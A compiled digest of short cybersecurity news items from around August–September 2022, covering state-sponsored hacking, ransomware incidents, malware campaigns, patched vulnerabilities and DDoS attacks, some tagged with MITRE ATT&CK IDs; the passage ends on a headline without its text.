    The U.S. Treasury Department on Friday announced sanctions against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies” (The Hacker News, 2022). According to the Treasury, the MOIS and its cyber actor proxies have engaged in malicious cyber operations targeting a range of government and private-sector organizations around the world and across various critical infrastructure sectors since at least 2017. More recently, in mid-July of this year, Iranian state-sponsored threat actors targeted Albanian government computer systems, forcing the government to temporarily suspend its online services. As a result, the Albanian government announced on September 7, 2022, that it would be serving diplomatic ties with Iran.

    China Accuses NSA's TAO Unit of Hacking its Military Research University

    China recently blamed the U.S National Security Agency for conducting cyberattacks aimed at aeronautical and military research-oriented Northwestern Polytechnical University in the city of Xi'an in June 2022. The National Computer Virus Emergency Response Centre (NCVERC) disclosed its findings last week, and accused the Office of Tailored Access Operations (TAO) at the USA's National Security Agency (NSA) of orchestrating thousands of attacks against the entities located within the country.

    Bumblebee Malware Adds Post-exploitation Tool for Stealthy Infections

    A new version of the Bumblebee malware loader has been spotted in the wild, featuring a new infection chain that uses the PowerSploit framework for stealthy reflective injection of a DLL payload into memory. Bumblebee was discovered in April, involved in phishing campaigns believed to be orchestrated by the same actors behind BazarLoader and TrickBot, i.e., the Conti syndicate. According to a report by Cyble, based on a finding by threat researcher Max Malyutin, the authors of Bumblebee are preparing a comeback from the summer hiatus of spam operations, using a new execution flow.

    GIFShell Attack Creates Reverse Shell Using Microsoft Teams GIFs

    Researchers discovered a new attack technique they are calling “GIFShell” which allows threat actors to abuse Microsoft Teams to execute commands and steal data using GIFs. Attackers are able to string together various Microsoft Teams vulnerabilities and flaws to deliver malicious files, commands, and perform data exfiltration using GIFs. The exfiltration is done through Microsoft’s own servers, which will make the malicious traffic harder to detect by security software.

    CISA Orders Agencies to Patch Chrome, D-Link Flaws Used in Attacks

    CISA has added 12 more security flaws to its list of bugs exploited in attacks, including two critical D-Link vulnerabilities and two (now-patched) zero-days in Google Chrome and the Photo Station QNAP software. The Google Chrome zero-day (CVE-2022-3075) was patched on September 2nd via an emergency security update after the company was made aware of in-the-wild exploitation.

    Zimbra Email Vulnerability Weaponized To Cause Large-Scale Compromise

    In August 2022, Cyble Research & Intelligence Labs (CRIL) discovered and reported an alarming trend of exploitation of the Zimbra Collaborative Suite (ZCS) by cybercriminals. During their routine monitoring of threat activities in various cybercrime forums to gauge the impact of cyberattacks, they discovered an instance wherein the web shell accesses to multiple email servers operating on Zimbra Collaboration Suite (ZCS) were auctioned in a Russian cybercrime forum. The impacted email servers were allegedly vulnerable to the authentication bypass remote code execution (RCE) vulnerability.

    Lazarus Group Unleashed a MagicRAT to Spy on Energy Providers

    The North Korean state-sponsored crime ring Lazarus Group is behind a new cyberespionage campaign with the goal to steal data and trade secrets from energy providers across the US, Canada and Japan. The Lazarus Group is perhaps best known for the infamous WannaCry attacks and a ton of cryptocurrency theft. Now it's going after the troubled energy markets run by its foes. In research published today, Cisco Talos threat researchers say they observed malicious activity attributed to Lazarus Group between February and July. The reconnaissance and spy campaigns targeted "multiple victims."

    Microsoft Warns of Ransomware Attacks by Iranian Phosphorus Hacker Group

    Microsoft's threat intelligence division on Wednesday assessed that a subgroup of the Iranian threat actor tracked as Phosphorus is conducting ransomware attacks as a "form of moonlighting" for personal gain. The tech giant, which is monitoring the activity cluster under the moniker DEV-0270 (aka Nemesis Kitten), said it's operated by a company that functions under the public aliases Secnerd and Lifeweb, citing infrastructure overlaps between the group and the two organizations.

    Cisco Won’t Fix Authentication Bypass Zero-Day in EoL Routers

    Cisco says that a new authentication bypass flaw affecting multiple small business VPN routers will not be patched because the devices have reached end-of-life (EoL). This zero-day bug (CVE-2022-20923) is caused by a faulty password validation algorithm that attackers could exploit to log into the VPN on vulnerable devices using what the company describes as "crafted credentials" if the IPSec VPN Server feature is enabled.

    LAUSD, One of the Largest School Districts in the U.S., Suffers Ransomware Attack

    Los Angeles Unified School District (LAUSD), the largest public school system in California and the 2nd largest public school district in the United States, revealed that last weekend it had been the victim of a ransomware incident that impacted its Information Technology (IT) systems. The LAUSD had 664,774 students enrolled for the 2020–2021 school year, including 50,805 adult students and 124,400 students attending independent charter schools. During the same academic year, it had 25,088 teachers and 50,586 other employees.

    Google: Former Conti Cybercrime Gang Members Now Targeting Ukraine

    Google says some former Conti ransomware gang members, now part of a threat group tracked as UAC-0098, are targeting Ukrainian organizations and European non-governmental organizations (NGOs). UAC-0098 is an initial access broker known for using the IcedID banking trojan to provide ransomware groups with access to compromised systems within enterprise networks.

    RCE Vulnerability Affects Zyxel NAS Devices — Firmware Patch Released

    On Tuesday, networking equipment manufacturer Zyxel rolled out firmware patches to address a critical security flaw impacting its network-attached storage devices. Tracked as CVE-2022-34747 (CVSS score: 9.8), the flaw is related to a format string vulnerability. According to Zyxel, CVE-2022-34747 was found in a specific binary of Zyxel NAS products and could enable an attacker to achieve unauthorized remote code execution via a specially crafted UDP packet.

    Security researcher Shaposhnikov IIya has been credited for discovering the vulnerability.
    Below is a list of the impacted Zxyel NAS devices:

    • NAS326 (V5.21(AAZF.11)C0 and earlier)
    • NAS540 (V5.21(AATB.8)C0 and earlier), and
    • NAS542 (V5.21(ABAG.8)C0 and earlier)
    As of writing, Zyxel hasn’t disclosed whether CVE-2022-34747 is being exploited in attacks in the wild.

    Authorities Shut Down WT1SHOP Site for Selling Stolen Credentials and Credit Card

    An international law enforcement operation has resulted in the dismantling of WT1SHOP, an online criminal marketplace that specialized in the sales of stolen login credentials and other personal information. The seizure was orchestrated by Portuguese authorities, with the U.S. officials taking control of four domains used by the website: ‘wt1shop[.]net,’ ‘wt1store[.]cc,’ "wt1store[.]com,’ and ‘wt1store[.]net.

    Moobot Botnet is Back and Targets Vulnerable D-Link Routers

    Palo Alto Network’s Unit 42 researchers reported a new wave of attacks launched by the Moobot botnet that target vulnerable D-Link routers. The recent wave of attacks started in August, and have been exploiting both old and new exploits (T1190). “The Mirai-based Moobot botnet was first documented by Palo Alto Unit 42 researchers in February 2021, in November 2021, it started exploiting a critical command injection flaw (CVE-2021-36260) in the webserver of several Hikvision products”

    New Worok Cyber-Espionage Group Targets Governments, High-Profile Firms

    A newly discovered cyber-espionage group has been hacking governments and high-profile companies in Asia since at least 2020 using a combination of custom and existing malicious tools. The threat group, tracked as Worok by ESET security researchers who first spotted it, has also attacked targets from Africa and the Middle East. To date, Worok has been linked to attacks against telecommunications, banking, maritime, and energy companies, as well as military, government, and public sector entities.

    Google Chrome Emergency Update Fixes New Zero-Day Used in Attacks

    On Friday, Google rolled out fixes to address a high-severity zero-day bug in the Chrome web browser. Tracked as CVE-2022-3075, the vulnerability is caused due to insufficient data validation in Mojo, a collection of runtime libraries that facilitates message passing across arbitrary inter- and intra-process boundaries. The flaw was discovered by a security researcher who anonymously reported it to Google. Since then, the company has issued a fix, releasing Chrome 105.0.5195.102 for Windows, Mac, and Linux.

    SharkBot Malware Resurfaces on Google Play to Steal Users' Credentials

    Researchers from Fox-IT, published a blog focusing on an upgraded version of the SharkBot mobile malware (T1587.001) which was seen uploaded to the Google Play Store (T1608.001). The updated version of the malware targets the banking credentials of Android users through malicious applications. Fox-IT notes that between the malicious apps, there have been roughly 60,000 installations. The apps have been removed from the Google Play Store and most notably are titled “Mister Phone Cleaner” and “Kylhavy Mobile Security.

    Google Chrome Bug Lets Sites Silently Overwrite System Clipboard Content

    A "major" security issue in the Google Chrome web browser, as well as Chromium-based alternatives, could allow malicious web pages to automatically overwrite clipboard content without requiring any user consent or interaction by simply visiting them. The clipboard poisoning attack is said to have been accidentally introduced in Chrome version 104, according to developer Jeff Johnson.

    New ransomware hits Windows, Linux servers of Chile govt agency

    Chile's national computer security and incident response team (CSIRT) has announced that a ransomware attack has impacted operations and online services of a government agency in the country. The attack started on Thursday, August 25, targeting Microsoft and VMware ESXi servers operated by the agency. The hackers stopped all running virtual machines and encrypted their files, appending the ".crypt" filename extension.

    New Evidence Links Raspberry Robin Malware to Dridex and Russian Evil Corp Hackers

    Researchers at IBM recently uncovered similarities between a malicious component used in Raspberry Robin infection chain and a Dridex malware loader, further strengthening the operator’s connection to the Russia-based Evil Corp group. First discovered in September 2021, Raspberry Robin is a worm that spreads via external drives. Since its discovery, the worm has remained in the shadows for nearly a year. However, in July 2022, Microsoft observed FakeUpdates (aka SocGholish) malware being delivered via existing Raspberry Robin infections, with potential connections identified between DEV-0206 and DEV-0243.

    San Francisco 49ers: Blackbyte Ransomware Gang Stole Info of 20K People

    NFL's San Francisco 49ers are mailing notification letters confirming a data breach affecting more than 20,000 individuals following a ransomware attack that hit its network earlier this year. The San Francisco Bay Area professional American football team confirmed that personal information (including names and Social Security numbers) belonging to 20,930 impacted individuals was accessed and/or stolen in the attack between February 6 and February 11, 2022.

    Researchers Analyzed a New JavaScript Skimmer Used by Magecart Threat Actors

    Cyble Research & Intelligence Labs started its investigation after seeing a post on Twitter a new JavaScript skimmer developed by the Magecart threat group used to target Magento e-commerce websites. In Magecart attacks against Magento e-stores, attackers attempt to exploit vulnerabilities in the popular CMS (T1190) to gain access to the source code of the website and inject malicious JavaScript (T1059.007). The malicious code is designed to capture payment data (credit/debit owner’s name, credit/debit card number, CVV number, and expiry date) from payment forms and checkout pages. The malicious code also performs some checks to determine that data are in the correct format, for example analyzing the length of the entered data.

    NSA and CISA Share Tips to Secure the Software Supply Chain

    The U.S. National Security Agency (NSA) and the Cybersecurity and Infrastructure Security Agency (CISA) have released tips today on securing the software supply chain. This guidance is designed by the Enduring Security Framework (ESF)—a public-private partnership that works to address threats to U.S. critical infrastructure and national security systems—to serve as a collection of suggested practices for software developers.

    Apple Releases Update for iOS 12 to Patch Exploited Vulnerability

    Apple has released an iOS 12 update for older iPhone and iPad devices, patching a vulnerability that was reportedly exploited by threat actors. According to a document published by the company on Wednesday, August 31, the flaw would allow the processing of maliciously crafted web content, which in turn led to arbitrary code execution.

    Over 1,000 iOS Apps Found Exposing Hardcoded AWS Credentials

    Security researchers are raising the alarm about mobile app developers relying on insecure practices that expose Amazon Web Services (AWS) credentials, making the supply chain vulnerable. Malicious actors could take advantage of this to access private databases, leading to data breaches and the exposure of customers' personal data.

    UK Imposes Tough New Cybersecurity Rules for Telecom Providers

    A new security framework for the UK’s telecommunications industry is set to come into effect in October, making the UK’s telecoms security regulations among the strongest in the world. A response to a public consultation was published by the UK government on August 30, 2022, and set out the changes made to the draft regulations and code of practice ahead of the planned commencement of the new framework in October 2022.

    Researchers Detail Emerging Cross-Platform BianLian Ransomware Attacks

    The operators of the emerging cross-platform BianLian ransomware have increased their command-and-control (C2) infrastructure this month, a development that alludes to an increase in the group's operational tempo. The earliest known C2 server associated with BianLian is said to have appeared online in December 2021. But the infrastructure has since witnessed a "troubling explosion" to surpass 30 active IP addresses.

    Ukraine Takes Down Cybercrime Group Hitting Crypto Fraud Victims

    The National Police of Ukraine (NPU) took down a network of call centers used by a cybercrime group focused on financial scams and targeting victims of cryptocurrency scams under the guise of helping them recover their stolen funds. The fraudsters behind these illegal call centers were also allegedly involved in scamming citizens of Ukraine and European Union countries interested in cryptocurrency, securities, gold, and oil investments. Throughout this cross-border fraud operation, they used software and high-tech equipment that made it possible to spoof the phone numbers of state banking organizations.

    Chinese Hackers Target Australian Govt With ScanBox Malware

    China-based threat actors have been targeting Australian government agencies and wind turbine fleets in the South China Sea by directing select individuals to a fake impersonating an Australian news media outlet. Victims landed on the fraudulent site after receiving phishing emails with enticing lures and received a malicious JavaScript payload from the ScanBox reconnaissance framework.

    Hackers Hide Malware in James Webb Telescope Images

    Threat analysts have spotted a new malware campaign dubbed ‘GO#WEBBFUSCATOR’ that relies on phishing emails, malicious documents, and space images from the James Webb telescope to spread malware. The malware is written in Golang, a programming language that is gaining popularity among cybercriminals because it is cross-platform (Windows, Linux, Mac) and offers increased resistance to reverse engineering and analysis.

    Cuba Ransomware Gang Takes Credit for Attacking Montenegro

    The Cuba ransomware gang is taking credit for attacking the government of Montenegro, which took offline multiple government websites and services amid what officials characterize as a targeted cyberattack. Government officials in the Western Balkan nation -which has a population of 620,000 - on Friday acknowledged disruptions to online government infrastructure.

    Chrome Extensions with 1.4 Million Installs Steal Browsing Data

    Threat analysts at McAfee found five Google Chrome extensions that steal track users’ browsing activity. Collectively, the extensions have been downloaded more then 1.4 million times. “The purpose of the malicious extensions is to monitor when users visit e-commerce website and to modify the visitor's cookie to appear as if they came through a referrer link. For this, the authors of the extensions get an affiliate fee for any purchases at electronic shops”

    Nelnet Servicing Breach Exposes Data of 2.5M Student Loan Accounts

    Data for over 2.5 million individuals with student loans from Oklahoma Student Loan Authority (OSLA) and EdFinancial was exposed after hackers breached the systems of technology services provider Nelnet Servicing. Technology services from Nelnet Servicing, including a web portal, are used by OSLA and EdFinancial to give students taking out a loan online access to their loan accounts.

    New Golang-based 'Agenda Ransomware' Can Be Customized For Each Victim

    Security researchers at Trend Micro recently uncovered a new ransomware strain that is being used in attacks targeting healthcare and education entities in Indonesia, Saudi Arabia, South Africa, and Thailand. Dubbed “Agenda,” the ransomware is a 64-bit Windows PE file written in the Go programming language. According to Trend Micro, “Agenda can reboot systems in safe mode, attempts to stop many server-specific processes and services, and has multiple modes to run.”

    Google Launches Open-Source Software Bug Bounty Program

    Google will now pay security researchers to find and report bugs in the latest versions of Google-released open-source software (Google OSS). The company's newly announced Vulnerability Reward Program (VRP) focuses on Google software and repository settings (like GitHub actions, application configurations, and access control rules). It applies to software available on public repositories of Google-owned GitHub organizations as well as some repositories from other platforms.

    FBI: Hackers Increasingly Exploit DeFi Bugs to Steal Cryptocurrency

    The U.S. Federal Bureau of Investigation (FBI) is warning investors that cybercriminals are increasingly exploiting security vulnerabilities in Decentralized Finance (DeFi) platforms to steal cryptocurrency. "The FBI encourages investors who suspect cyber criminals have stolen their DeFi investments to contact the FBI via the Internet Crime Complaint Center or their local FBI field office.

    Critical Hole in Atlassian Bitbucket Allows Any Miscreant to Hijack Servers

    A critical command-injection vulnerability in multiple API endpoints of Atlassian Bitbucket Server and Data Center could allow an unauthorized attacker to remotely execute malware, and view, change, and even delete data stored in repositories. Atlassian has fixed the security holes, which are present in versions 7.0.0 to 8.3.0 of the software. There have been no reports of active exploitation in the wild. The vulnerability which is tracked as CVE-2022-36804 received a CVSS score of 9.9, and users are urged to update servers as soon as possible.

    US Cyber Command and NSA Partner On Defense Efforts For Midterms

    US military and intelligence entities are renewing their efforts to protect electoral procedures from hacking and disinformation before and during the November midterms elections. The news comes from the US Cyber Command (USCYBERCOM) and the National Security Agency (NSA), who published a joint blog post detailing their security capabilities on Thursday.

    Nitrokod Crypto Miner Infected Over 111,000 Users with Copies of Popular Software

    A Turkish-speaking entity called Nitrokod has been attributed to an active cryptocurrency mining campaign that involves impersonating a desktop application for Google Translate to infect over 111,000 victims in 11 countries since 2019. The list of countries with victims includes the U.K., the U.S., Sri Lanka, Greece, Israel, Germany, Turkey, Cyprus, Australia, Mongolia, and Poland.

    Montenegro Says Russian Cyberattacks Threaten Key State Functions

    Members of the government in Montenegro are stating that the country is being hit with sophisticated and persistent cyberattacks that threaten the country’s essential infrastructure. Targets include electricity and water supply systems, transportation services, online portals that citizens use to access various state services, and more. Already, several power plants have switched to manual operations, while the state-managed IT infrastructure has been taken offline to contain the effect of the attacks.

    MERCURY leveraging Log4j 2 vulnerabilities in unpatched systems to target Israeli organizations

    In the last couple of weeks, the Microsoft Threat Intelligence Center (MSTIC) and Microsoft 365 Defender Research Team have spotted Iran-based threat actors leveraging Log4j 2 vulnerabilities in SysAid applications to target organizations located in Israel. The actors belong to a group called MERCURY, which Microsoft assesses with high confidence to be affiliated with Iran’s Ministry of Intelligence and Security (MOIS).

    CISA: Vulnerability in Delta Electronics ICS Software Exploited in Attacks

    On Thursday, CISA added 10 security flaws to its list of actively exploited vulnerabilities catalog, mandating federal agencies to take action by September 15. One of the flaws is a high-severity remote code execution vulnerability in Delta Electronics DOPSoft 2, an industrial automation software used for designing and programming human-machine interfaces (HMIs). Tracked as CVE-2021-38406, the flaw is related to an out-of-bounds write issue and is exploited by tricking the targeted user to open a specially crafted project file. The vulnerability was discovered last year in September. However, at the time, CISA stated that the flaw would not be patched as the product had reached its end of life, with the vendor encouraging its customers to switch to a supported software release.

    Nato Investigates Hacker Sale of Missile Firm Data

    ato is assessing the impact of a data breach of classified military documents being sold by a hacker group online. The data includes blueprints of weapons being used by Nato allies in the Ukraine conflict. Criminal hackers are selling the dossiers after stealing data linked to a major European weapons maker.

    LastPass Developer Systems Hacked to Steal Source Code Summary:

    LastPass, a popular password management firm suffered a data breach two weeks ago, enabling threat actors to exfiltrate the company’s source code and proprietary technical information. On Thursday, LastPass released a security advisory confirming the breach, stating that the hackers compromised a developer account to access the company’s developer environment. As of writing, LastPass has yet to disclose how the threat actors were able to compromise the developer account or what source code was stolen. However, the company confirmed that it has not found any evidence that customer data or encrypted password vaults were compromised.

    'Kimsuky' Hackers Ensure Their Malware Only Reach Valid Targets

    The North Korean 'Kimsuky' threat actors are going to great lengths to ensure that their malicious payloads are only downloaded by valid targets and not on the systems of security researchers. According to a Kaspersky report published today, the threat group has been employing new techniques to filter out invalid download requests since the start of 2022, when the group launched a new campaign against various targets in the Korean peninsula.

    More Hackers Adopt Sliver Toolkit as a Cobalt Strike Alternative

    With Cobalt Strike growing in popularity as an attack tool for various threat actors, many defenders have learned to detect and stop attacks relying on this toolkit. As a result, hackers have moved to other frameworks like Sliver that aren’t so popular and can go unnoticed by Endpoint Detection and Response (EDR) and antivirus solutions.

    PyPI Packages Hijacked After Developers Fall for Phishing Emails

    Attacks against Python packages continue, yesterday researchers found a phishing campaign (T1566.002) targeting the PyPI registry. The Python packages “extol” and “spam” are among hundreds seen laced with malware after attackers compromised the accounts of maintainers who fell victim to a phishing email. ”Admins of the PyPI registry confirmed yesterday a phishing email campaign had actively been targeting PyPI maintainers after Django project board member Adam Johnson reported receiving a suspicious email. The email urges developers, who have their packages published to PyPI, to undergo a mandatory "validation" process or risk getting their packages purged from the PyPI registry (T1204.001).

    AiTM Phishing Campaign Also Targets G Suite Users

    The threat actors behind a large-scale adversary-in-the-middle (AiTM) phishing campaign targeting enterprise users of Microsoft email services were spotted targeting Google G Suite users. The threat actors are using a proxy server between the victim and the website they user is trying to visit (T1557). The phishing site which is controlled by the threat actors allows them to monitor traffic and target the victims password and session cookie.

    Air-Gap Attack Exploits Gyroscope Ultrasonic Covert Channel to Leak Data

    A new data exfiltration technique has been discovered, which uses a covert ultrasonic channel to leak sensitive information from air-gapped computers to a nearby smartphone device. The adversarial model is called “Gairoscope” and was designed by Dr. Mordechai Guri, head of research and development (R&D) in the Cyber Security Research Center at the Ben Gurion University of the Negev in Israel.

    Pirated 3DMark benchmark tool delivering info-stealer malware

    Cybersecurity researchers have discovered multiple ongoing malware distribution campaigns that target internet users who seek to download copies of pirated software. The campaign uses SEO poisoning and malvertising to push malicious shareware sites high in Google Search results, promoting fake software along with cracks and product activation key generators.

    French Hospital Hit by $10M Ransomware Attack, Sends Patients Elsewhere

    The Center Hospitalier Sud Francilien (CHSF), a 1000-bed hospital located 28km from the center of Paris, suffered a cyberattack on Sunday, which has resulted in the medical center referring patients to other establishments and postponing appointments for surgeries. CHSF serves an area of 600,000 inhabitants, so any disruption in its operations can endanger the health, and even lives, of people in a medical emergency.

    GitLab Patches Critical Remote Code Execution Vulnerability

    On Monday, DevOps platform GitLab rolled out patches for a remote code execution vulnerability impacting its GitLab Community Edition (CE) and Enterprise Edition (EE) releases. Tracked as CVE-2022-2884, the flaw received a CVSS score of 9.9/10, indicating a critical level of severity. According to GitLab, an authenticated user can achieve remote code execution via the GitHub import API.

    Below is a list of the impacted CE/EE versions:

    • All versions starting from 11.3.4 before 15.1.5
    • All versions starting from 15.2 before 15.2.3
    • All versions starting from 15.3 before 15.3.1
    CVE-2022-2884 has been addressed in GitLab Community Edition and Enterprise Edition versions 15.3.1, 15.2.3, and 15.1.5.

    Counterfeit Android Devices Revealed to Contain Backdoor Designed to Hack WhatsApp

    A team of mobile security researchers has discovered backdoors in the system partition of some budget Android device models that are counterfeit versions of known brand-name models (T1036). The malware, which the Doctor Web team first discovered in July 2022, was found in at least four different smartphones: ‘P48pro’, ‘radmi note 8’, ‘Note30u’ and ‘Mate40’. The threat actors used counterfeit devices that mimicked famous brand-name models. However, instead of having the latest OS version installed, they would come pre-installed with outdated versions.

    Over 80,000 Exploitable Hikvision Cameras Exposed Online

    Security researchers have discovered over 80,000 Hikvision cameras vulnerable to a critical command injection flaw that's easily exploitable via specially crafted messages sent to the vulnerable web server. The flaw is tracked as CVE-2021-36260 and was addressed by Hikvision via a firmware update in September 2021. However, according to a whitepaper published by CYFIRMA, tens of thousands of systems used by 2,300 organizations across 100 countries have still not applied the security update.

    CISA Warns of Active Exploitation of Palo Alto Networks' PAN-OS Vulnerability

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a security flaw impacting Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. The high-severity vulnerability tracked as CVE-2022-0028 (CVSS score: 8.6), is a URL filtering policy misconfiguration that could allow an unauthenticated, remote attacker to carry out reflected and amplified TCP denial-of-service (DoS) attacks.

    FBI Warns of Residential Proxies Used in Credential Stuffing Attacks

    The Federal Bureau of Investigation (FBI) warns of a rising trend of cybercriminals using residential proxies to conduct large-scale credential stuffing attacks without being tracked, flagged, or blocked. Credential stuffing is a type of attack where threat actors use large collections of username/password combinations exposed in previous data breaches to try and gain access to other online platforms. Because people commonly use the same password at every site, cybercriminals have ample opportunity to take over accounts without cracking passwords or phishing any other information.

    Google: Iranian Hackers Use New Tool to Steal Email from Victims

    State-sponsored Iranian hacking group Charming Kitten has been using a new tool to download email messages from targeted Gmail, Yahoo, and Microsoft Outlook accounts. The name of the utility is Hyperscraper and like many of the threat actor’s tools and operations, it is far from sophisticated. The APT group uses the tool to steal emails from a victim’s inbox without leaving any traces of their intrusion. Google has attributed the still under-development tool to Charming Kitten (APT35, Phosphorus), an Iranian backed hacking group. Early samples of the malware date back to 2020.

    Threat Actor Deploys Raven Storm Tool to Perform DDoS Attacks

    The threat actor dubbed 'Mysterious Team' has used the Raven Storm tool to conduct distributed denial-of-service (DDoS) attacks against multiple targets. The news comes from CloudSEK, who detailed the new threat in an advisory on Sunday. The tool uses multi-threading to send multiple packets at a victim server. The device can be used to take down servers and has also carried out Wi-Fi and application layer attacks (layer 3 (network), level 4 (transport), level 5 (application). The malware can also connect to a client via botnets.

    Escanor Malware Delivered in Weaponized Microsoft Office Documents

    Security researchers from Resecurity “identified a new RAT (Remote Administration Tool) advertised in Dark Web and Telegram called Escanor. The threat actors offer Android-based and PC-based versions of RAT, along with HVNC module and exploit builder to weaponize Microsoft Office and Adobe PDF documents to deliver malicious code. Escanor has been for sale since January of this year, and started as a compact HVNC implant that allowed for silent remote connections to a victims computer. Over time it has transformed into a full-scale commercial RAT with robust features. On the groups Telegram channel they have over 28,000 subscribers, leading researchers to believe the tool is building a credible reputation on the dark web. The tool is thought to have borrowed functionality from other cracked version of dark web tools including Venom RAT, 888 RAT and Pandora HVNC.

    WordPress Sites Hacked With Fake Cloudflare DDos Alerts Pushing Malware

    According to security researchers at Sucuri, threat actors are now hacking poorly protected WordPress sites to display fake Cloudflare DDoS protection pages, enabling the download of malicious remote access trojans (RAT) like NetSupport RAT and Raccoon Stealer. “We recently discovered a malicious JavaScript injection affecting WordPress websites which results in a fake CloudFlare DDoS protection popup. Since these types of browser checks are so common on the web many users wouldn’t think twice before clicking this prompt to access the website they’re trying to visit. However, the prompt actually downloads a malicious **.**iso file onto the victim’s computer".

    Grandoreiro Banking Malware Targets Manufacturers in Spain, Mexico

    Cyber analysts at Zscaler recently uncovered a new campaign that is targeting employees of a chemicals manufacturer in Spain and workers of automotive and machinery makers in Mexico with banking malware. Dubbed, Grandoreiro, the banking trojan has been active since 2016 targeting Brazil and Peru, expanding to Mexico and Spain in 2019. In the latest campaign spotted by Zscaler, starting in June 2022 and still ongoing, researchers noted that Grandoreiro malware authors have added new features to evade detection and anti-analysis in addition to revamping their C2 system.

    Greek Natural Gas Operator Suffers Ransomware-Related Data Breach

    Greece's largest natural gas distributor DESFA confirmed on Saturday that they suffered a limited scope data breach and IT system outage following a cyberattack. In a public statement shared with local news outlets on Saturday, DESFA explained that hackers attempted to infiltrate its network but were thwarted by the quick response of its IT team. However, some files and data were accessed and possibly "leaked," so there was a network intrusion, even if limited.

    Two Years On, Apple iOS VPNs Still Leak IP Addresses

    Apple has left a VPN bypass vulnerability in iOS unfixed for at least two years, leaving identifying IP traffic data exposed, and there's no sign of a fix. Back in early 2020, secure mail provider ProtonMail reported a flaw in Apple’s iOS version 13.3.1 that prevented VPNs from encrypting all traffic. The issue was that the operating system failed to close existing connections.

    A Flaw in Amazon Ring Could Expose User’s Camera Recordings

    In May, Amazon fixed a high-severity vulnerability in its Ring app for Android that could have allowed a malicious app installed on a user’s device to access sensitive information and camera recordings. The Ring app allows users to monitor video feeds from multiple devices, including security cameras, video doorbells, and alarm systems. The Android application has been downloaded over 10 million times. Researchers from security firm Checkmarx discovered a vulnerability in the com.ringapp/com.ring[.]nh.deeplink.DeepLinkActivity activity, which was implicitly exported in the Android Manifest and, for this reason, it was accessible to other applications on the same device.

    Researchers Detail Evasive DarkTortilla Crypter Used to Deliver Malware

    Researchers at Secureworks recently disclosed details of a .NET based crypter dubbed DarkTortilla that is being used by threat actors to distribute info stealers and remote access trojans (RATs) including AgentTesla, AsyncRat, NanoCore, and RedLine as well as popular payloads like Cobalt Strike and MetaSploit. The malware can also be utilized to deliver “addon packages” such as additional malicious payloads, benign decoy documents, and executables. While is not known where or how much the tool is being sold for, DarkTortilla has sparked an interest in cybercriminals as it features anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.

    Google Blocks Largest HTTPS DDoS Attack ‘Reported to Date’

    A Google Cloud Armor customer was hit with a distributed denial-of-service (DDoS) attack over the HTTPS protocol that reached 46 million requests per second (RPS), making it the largest ever recorded of its kind. In just two minutes, the attack escalated from 100,000 RPS to a record-breaking 46 million RPS, almost 80% more than the previous record, an HTTPS DDoS of 26 million RPS that Cloudflare mitigated in June. The attack is said to have commenced on the morning of June 1, at 09:45 pacific time, targeting a customer’s HTTP/S Load Balancer with an initial 10,000 RPS. Within 8 minutes, the attack grew to 100,000 RPS, causing Google’s Cloud Armor Adaptive Protection to detect the attack and generate an alert containing signatures based on data pulled from traffic analysis. The alert included a recommended rule that the security team deployed into their security policy to block the attack traffic. However, within the next 2 minutes, the attack increased from 100,000 RPS to a record-breaking 46 million RPS. In total the attack lasted for 69 minutes, ending at 10:54 am. Since Cloud Amor was blocking the traffic, the attack slowly decreased in size after peaking.

    Bumblebee Attacks, From Initial Access to the Compromise of Active Directory Services

    The Cybereason Global Security Operations Center (GSOC) Team analyzed a cyberattack that involved the Bumblebee Loader and detailed how the attackers were able to compromise the entire network. Most Bumblebee infections started by users executing LNK files (T1204.002) which use a system binary to load the malware. The malware is distributed through phishing messages using a malicious attachment (T1566.001) or a link (T1566.002) to the malicious archive containing Bumblebee.

    ATMZOW JS Sniffer Campaign Linked to Hancitor Malware

    Researchers from Group-IB found a link between the ATMZOW JS Sniffer campaign and the Hancitor malware downloader. They released their findings in a blog post this week. The connection was made early this week by threat intelligence analyst Victor Okorokov from Group-IB, who said ATMZOW successfully infected at least 483 websites across four continents since the beginning of 2019. Group-IB specialists collected information about ATMZOW’s recent activity and found ties with a phishing campaign targeting clients of a US bank based on the same JS obfuscation technique.

    BlackByte Ransomware Gang Is Back With New Extortion Tactics

    The BlackByte ransomware is back with version 2.0 of their operation, including a new data leak site utilizing new extortion techniques borrowed from LockBit. After a brief disappearance, the ransomware operation is now promoting a new data leak site on hacker forums and through Twitter accounts the threat actor controls. With BlackByte 2.0 recently being introduced, it is unclear what technical changes were made to the ransomware encryptor. As for BlackByte’s new Tor data leak site, the ransomware operators have introduced a similar extortion strategy to that of LockBit where victims can pay on the site to extend the publishing of their data by 24 hours ($5,000), download the data ($200,000), or destroy all the data ($300,000). These prices are not set in stone as they will vary depending on the victim being targeted.

    Apple Security Updates Fix 2 Zero-Days Used to Hack iPhones, Macs

    On Wednesday, Apple rolled out fixes to address two zero-day vulnerabilities that were previously exploited by threat actors to compromise several Apple products including IPhones, iPads, and Macs. The first vulnerability, tracked as CVE-2022-32804, is related to an out-of-bounds write vulnerability in the operating system’s kernel.

    Researchers Link Multi-Year Mass Credential Theft Campaign to Chinese Hackers

    Researchers at Recorded Future recently attributed a multi-year mass credential theft campaign targeting global humanitarian, think tank, and government organizations to a threat group that goes by the alias RedAlpha. First identified by Citizen Lab in January 2018, the threat group has a history of conducting cyber espionage and surveillance operations directed against the Tibetan community to facilitate intelligence collection.

    Google Fixes Fifth Chrome Zero-Day Bug Exploited This Year

    On Tuesday Google released a security update for the Chrome Browser to address several vulnerabilities, one of which is a high-severity zero-day flaw. Tracked as CVE-2022-2856, the vulnerability is related to the insufficient validation of untrusted input in Intents, a feature that enables the launching of applications and web services directly from a web page. While Google has not disclosed the technical details of the bug, “bad input validation in software can serve as a pathway to overriding protections or exceeding the scope of the intended functionality, potentially leading to buffer overflow, directory traversal, SQL injection, cross-site scripting, null byte injection, and more.

    North Korea-linked APT Targets Job Seekers with macOS Malware

    ESET researchers continue to monitor a cyberespionage campaign, tracked as “Operation In(ter)ception,” that has been active at least since June 2020. The campaign targets employees working in the aerospace and military sectors and leverages decoy job offer documents. In a series of tweets, ESET detailed a recent campaign from the group. They spotted a signed Mac executable disguised as a job description for Coinbase (T1036). The file was uploaded to VirusTotal from an IP in Brazil on August 11, 2022.

    The Return of LOIC, HOIC, HULK, and Slowloris to the Threat Landscape

